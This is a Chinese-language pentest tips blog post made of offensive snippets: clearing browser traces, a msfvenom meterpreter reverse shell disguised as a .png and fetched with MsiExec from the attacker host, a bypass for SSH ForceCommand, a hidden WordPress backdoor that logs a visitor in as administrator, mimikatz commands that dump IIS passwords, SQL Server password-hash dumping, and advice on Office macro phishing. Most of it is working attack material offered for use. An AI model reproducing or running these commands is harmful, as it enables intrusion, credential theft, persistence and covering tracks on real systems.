MENU

Pentest Tips Archive

December 16, 2016 • Security

痕迹清除

命令行删除IE浏览器的history, cookies, form data, pwds 以及临时文件的方法 (删除过程过弹个框,删完后消失)

C:\> rundll32.exe inetcpl.cpl,ClearMyTracksByProcess 255

用户名信息收集

通过目标网站上的PDF/DOC等文件的metadata来收集用户名信息,可以借助的工具有图形界面的FOCA或命令行界面的Metagoofil

Metagoofil的用法如下:

python metagoofil.py -d example.com -t doc,pdf -l 200 -n 50 -o examplefiles -f results.html

FOCA的使用方法和工具下载如下:

http://lifeofpentester.blogspot.com/2014/11/foca-metadata-analysis-tool.html

绕过SSH ForceCommand

如果管理员在sshd_config中配置了ForceCommand选项,当我们在SSH连接上后,立刻就会断开,这时如果有webshell,可以通过编辑一个可以登录ssh用户的.bashrc文件,命令如echo "exec sh" > .bashrc,来绕过限制.

本地执行MSI

在本地执行远程恶意MSI文件的方法:

1.生成payload

msfvenom -f msi -p windows/meterpreter/reverse_tcp LHOST=10.18.180.148 LPORT=4444 > meterp.png

2.在攻击者的机器上监听端口,等待肉鸡上线

msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 10.18.180.148
set ExitOnSession false
exploit -j -z

3.肉鸡上执行

MsiExec /i http://10.18.180.148:88/meterp.png /q

wordpress猥琐后门

<?php

    require('../../../wp-blog-header.php'); //我基本都是放到3级目录下。也可以放到根目录,但是容易被发现。
    $query_str = "SELECT ID FROM $wpdb->users";
    $user_ids = $wpdb->get_results($query_str);
    foreach ($user_ids as $uid) {
        $user_id = $uid->ID;
        if (user_can($user_id, 'administrator')) {
            $user_info = get_userdata($user_id);
            $user_login = $user_info->user_login;
            wp_set_current_user($user_id, $user_login);
            wp_set_auth_cookie($user_id);
            do_action('wp_login', $user_login);
            echo "You are logged in as $user_login";
            if (function_exists('get_admin_url')) {
                wp_redirect(get_admin_url());
            } else {
                wp_redirect(get_bloginfo('wpurl') . '/wp-admin');
            }
            exit;
        }
    }


?>

自动调用管理员帐号登录wordpress后台

mimikatz

mimikatz支持通过修改termsrv.dll实现RDP客户端多开了,命令如下

"ts::multirop"

Linux bind shell 后门

https://github.com/antire-book/dont_panic

使用多种逆向对抗技术的 Linux bind shell 后门

nc端口扫描

内网环境中,如果LINUX主机没有安装nmap,可以借助nc实现端口扫描

for i in {101..102}; do nc -vv -n -w 1 192.168.56.$i 21-25 -z; done

一句话开启 HTTP 服务器

offcie marco

offcie文档里嵌入恶意marco对目标进行钓鱼攻击一直是比较古老而有用的手法,但是默认offcie宏是关闭的,间接影响了一些攻击效果。原来在xss攻击的时候,也有配合http basic认证实现帐号钓鱼攻击的,这种攻击手法对office文档一样适用,但是需要使用https,这是可以选择自签名证书(会有证书非信任提示)或者去letencrypt申请一个个人证书使用(可以避免自签名证书的提示)。申请方法可以参考:

Windows Hosts/IIS Config

Windows7/2008等:

C:\Windows\System32\drivers\etc\hosts

Windows2003:

C:\WINDOWS\SYSTEM32\DRIVERS\ETC\HOSTS

提权情况下或者过了UAC的情况下直接type一下就行了

IIS6:

adsutil.vbs

cscript.exe C:\Inetpub\AdminScripts\adsutil.vbs ENUM W3SVC/1/root

iis7/8:

appcmd.exe

列出网站列表

%systemroot%/system32/inetsrv/appcmd.exe list site

列出网站物理路径:

%systemroot%\system32\inetsrv\appcmd.exe list vdir

导出指定网站的配置信息:

%windir%\system32\inetsrv\appcmd list site /config /xml

Mimiktaz读取IIS7配置文件密码:

mimikatz.exe privilege::debug log "iis::apphost /in:"%systemroot%\system32\inetsrv\config\applicationHost.config" /live" exit

SqlServer脱裤技巧

安装目录下自带管理工具:

osql.exe

osql /S 192.168.2.2 -U cms -P sa /Q "SELECT name,password_hash FROM sys.sql_logins" -o c:\windows\temp\test.txt

sqlcmd.exe

sqlcmd -U cms -P sa -S 192.168.2.2 -Q "select * from test">>c:\windows\temp\test.txt

bcp.exe

Archives QR Code
QR Code for this page
Tipping QR Code